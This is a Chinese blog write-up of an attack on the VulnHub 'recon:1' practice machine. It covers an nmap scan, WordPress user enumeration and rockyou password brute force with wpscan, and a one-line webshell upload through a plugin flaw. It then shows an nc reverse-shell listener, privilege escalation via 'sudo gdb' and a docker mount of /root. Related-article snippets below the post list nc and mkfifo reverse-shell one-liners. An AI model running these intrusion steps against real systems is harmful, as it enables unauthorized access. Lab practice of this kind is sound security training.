靶机训练:VulnHub-recon:1

最新推荐文章于 2024-01-23 20:46:44 发布
最新推荐文章于 2024-01-23 20:46:44 发布
阅读量501 收藏
点赞数 1
分类专栏: 靶机训练 文章标签: shell linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/admin_whp/article/details/109537814
版权

靶机下载:https://www.vulnhub.com/entry/recon-1,438/

测试工具:靶机、kali、Windows(可选)

测试过程:

1、下载好靶机后,先导入虚拟机中,网卡模式使用NAT模式
111111
2、打开虚拟机(我这里使用的是VMware),首先要修改root密码登录(为了配置网络),破解密码教程
3、进入系统后查看IP,发现不能获取IP,经查资料以后发现配置文件/etc/network/interfaces中的网卡不对,将图中该位置修改为ens33
在这里插入图片描述
4、重新启动网卡(以下任意一条命令即可)

# service network restart
# /etc/init.d/networking restart

查看靶机ip:ifconfig
在这里插入图片描述
5、使用nmap对靶机进行端口扫描

nmap -sT 192.168.26.130

在这里插入图片描述
6、发现了22和80端口是开放的,22应该是用于远程连接的,先访问一下80端口
在这里插入图片描述
浏览发现有登录的入口,尝试登陆
在这里插入图片描述
7、试了几个简单的用户名和密码后发现不行,使用wpscan枚举用户名试试

wpscan --url 192.168.26.130 -e u

在结果中发现了这样两条结果
在这里插入图片描述
8、尝试进行密码爆破(-U 指定用户名、-P 指定密码字典)

wpscan --url 192.168.26.130 -U reconauthor -P /usr/share/wordlists/rockyou.txt

在这里插入图片描述
8、爆出了密码,尝试登录
在这里插入图片描述
9、发现这里可以上传文件,先下载下来hack文件查看一下
在这里插入图片描述
在这里插入图片描述
hack.zip应该是一个php反弹木马,意味着这个目录下可以执行zip压缩文件下的php文件,尝试上传一句话木马,并用蚁剑连接
在这里插入图片描述
连接失败,再看看别的绕过办法

10、经过百度,发现在在这里可以上传且执行(看漏洞详细介绍链接
在这里插入图片描述
11、上传一句话木马,用蚁剑连接
在这里插入图片描述
在这里插入图片描述
连接成功(http://website/wp-content/uploads/articulate_uploads/poc/index.php),在Wordpress目录下上传php大马
在这里插入图片描述
12、访问大马,拿到Webshell,提权
查看可利用的用户:cat /etc/passwd |grep /bin/bash
在这里插入图片描述
查看系统信息:uname -a
在这里插入图片描述
查看版本信息:lsb_release -a
在这里插入图片描述
到/home目录下看看有没有可用的信息,看来接下来要找root的一个叫flag.txt的文件,接着淦
在这里插入图片描述
13、继续提权,查看有没有可以利用的命令find / -user root -perm -4000 -print 2>/dev/null 不过好像没什么可用的,但是mount、umount好像用得到,
在这里插入图片描述
14、在/tmp目录下上传一个反弹shell,并在kali上开启监听nc -lvvp 6666 6666为监听端口号
在这里插入图片描述
在这里插入图片描述
在大马页面运行反弹shell,kali监听到了
在这里插入图片描述
在这里插入图片描述
将简单的Shell转换成为完全交互式shellpython3 -c 'import pty;pty.spawn("/bin/bash")'
在这里插入图片描述
15、切换到/home目录下,查看所有文件ls -al
在这里插入图片描述
找可获取权限的用户的密码:find / -user hacker find / -user offensivehack找到文件但是没有权限
看看自己能执行哪些权限sudo -l,有惊喜
在这里插入图片描述
尝试执行试试:sudo -u offensivehack /usr/bin/gdb
在这里插入图片描述
接着获取offensivehack用户的权限:!bash
在这里插入图片描述
查看可执行哪些权限:suod -l,看来需要密码,行不通
在这里插入图片描述
再看看别的信息:groups,发现了有docker
在这里插入图片描述
查看docker镜像:docker images
在这里插入图片描述
尝试将root目录挂载到Ubuntu的/mnnt目录下docker run -it -v /root:/mnnt/ ubuntu /bin/bash,成功
在这里插入图片描述
16、进入/muut目录,查看flag.txt文件,‘Good Job’,终于完成了。
在这里插入图片描述

admin_dpp
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Linux反弹Shell总结
qq_45600801的博客
01-06 4258
反弹姿势 1、NC正向反弹 靶机: nc -lvvp 靶机端口 -e /bin/sh 攻击机: nc 靶机ip 靶机端口 2、NC反向反弹 (1)、可使用-e参数: 靶机: nc x.x.x.x 8888 -e /bin/bash 攻击机: nc -lvvp 8888 (2)、NC,无-e参数反弹shell 有些版本的NC可能不支持-e选项,不能使用-e,则: 方法一: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc
NC的用法
thislocal的博客
03-31 439
NC工具的使用说明 参数介绍:  nc.exe -h即可看到各参数的使用方法。  基本格式:nc [-options] hostname port [ports] ...  nc -l -p port [options] [hostname] [port] -d 后台模式  -e prog 程序重定向,一旦连接,就执行 [危险!!]  -g gateway source-ro
Vulnhub 靶机实战系列:DC -3网站管理员账号密码和系统提权
weixin_50815573的博客
03-03 4560
Vulnhub 靶机实战系列:DC -3网站管理员账号密码和系统提权 搭建测试靶机 下载地址:DC: 3.2 ~ VulnHub 则靶机DC-3 ip:192.168.1.106(NAT连接) 攻击机kali linux ip:192.168.1.237 信息收集 使用:nmap -sP 192.168.0.0/24 进行扫描找到目标靶机 对目标靶机进行端口扫描 利用nmap对目标主机进行端口扫描,发现开放端口:80 使用命令:nmap -A -p- -T4 192.168.1.106
【Vulnhub】搭建Vulnhub靶机
最新发布
qq_53058639的博客
01-23 2485
Vulnhub它是一个提供各种网络攻防靶场的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。
Vulnhub靶机haclabs:deception1.1渗透
xingjinhao123的博客
09-05 711
靶机介绍 官方下载地址:https://www.vulnhub.com/entry/haclabs-deception11,440/ 靶机有三个flag,第一个flag是下载靶机镜像压缩包的密码,第二个flag在yash用户的家目录里面,第三个flag在root目录下 运行环境 靶机:网络设为桥接模式,IP地址:192.168.1.114 攻击机:同网段下的kali linux,IP地址:192.168.1.115 开始渗透 获取解压密码 将官网提示的字符串使用十六进制解码之后得到密码 将靶机运行起来
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
VulnHub-Tr0ll1.zip
01-12
VulnHub-Tr0ll1靶机学习笔记,一部分是学习笔记过程,另一部分是学习过程整理的lol.pacp\.c文档、user.txt等文档,供大家参考学习
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
Vulnhub-CTF5靶机实战
御七彩虹猫
05-16 1607
Vulnhub-CTF5靶机实战
VulnHub渗透测试实战靶场笔记(持续更新)
晚风不及你
03-05 7496
Breach1.0 下载链接 https://download.vulnhub.com/breach/Breach-1.0.zip 靶机说明 Breach1.0是一个难度为初级到中级的BooT2Root/CTF挑战。 VM虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网卡设置为host-only方式组网。非常感谢Knightmare和rastamouse进行测试和提供反馈。...
vulnhub靶机AI-Web-1.0渗透笔记
weixin_52125240的博客
07-14 1371
vulnhub靶机AI-Web-1.0渗透笔记
【安全】vulnhub实验ica1
qq_43017750的博客
12-22 3627
查看当前网卡ip ┌──(kali㉿kali)-[~] └─$ ifconfig eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.56.102 netmask 255.255.255.0 broadcast 192.168.56.255 inet6 fe80::20c:29ff:feea:9e42 prefixlen 64 scopeid 0x20<lin
Vulnhub:BREAKOUT靶机
qq_63283137的博客
10-10 532
smb服务是一个协议名,它能被用于Web连接和客户端与服务器之间的信息沟通,通过 SMB 协议,客户端应用程序可以在各种网络环境下读、写服务器上的文件,以及对服务器程序提出服务请求。可以配置操作系统内部,如用户,磁盘配额,服务或配置文件,以及修改和控制开源应用程序。每当看到二进制文件的副本时,都应该检查一下其 Capabilities(功能)和 suid 程序。根据爆破出来的用户,与解密出的密码尝试登录webmin。再分析扫描出的信息,发现端口服务是smb。发现密码备份文件,但是没有任何的权限。
vulnhub靶机渗透测试DC-2靶机渗透
m0_62008601的博客
04-29 1430
攻击机-kali-IP:192.168.56.102 靶机-dc2-ip:192.168.103 关于我的这两台机子的网络设置在上一篇文章中已经提到,这里就不再叙述。 查找dc-2 的IP arp-scan-l 得到ip为192.168.56.103 扫描开启的端口 nmap -sV -p- 192.168.56.103 此时发现开启了80端口和ssh服务且将ssh服务的端口改成了7744端口(ssh默认端口是:22) 因为开启了80端口,此时我们可以去访问它的web服务 此
vulnhub靶机DC-1
cyzCc的博客
02-15 913
1.启动DC1靶机发现没有登录密码 2.信息收集 主机发现,由于是与主机nat连接,所以需要找到dc1的IP地址 dc1的Mac地址是 nmap -sP 192.168.211.0/24 所以dc1 靶机的ip地址是192.168.211.133 扫描主机上开启的服务 nmap -A 192.168.211.133 -p 1-65535 发现目标开启了22端口和80端口 22端口考虑ssh...
vulnhub靶机DC-4 渗透笔记
liver100day的博客
06-09 2094
DC-4 靶机渗透 靶机环境搭建 攻击渗透机: kali IP地址:192.168.75.128 靶机:DC-3 IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/dc-4,313/ 渗透过程 1.信息收集 1.1 主机发现 arp-scan -l 扫描局域网所有设备(所有设备IP、MAC地址、制造商信息) 确认目标靶机IP地址:192.168.75.148 1.2 端口扫描 确认了IP地址,接下来我们就使用端口扫描神器来扫描目标靶机开放的端口 nmap -T4 -
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值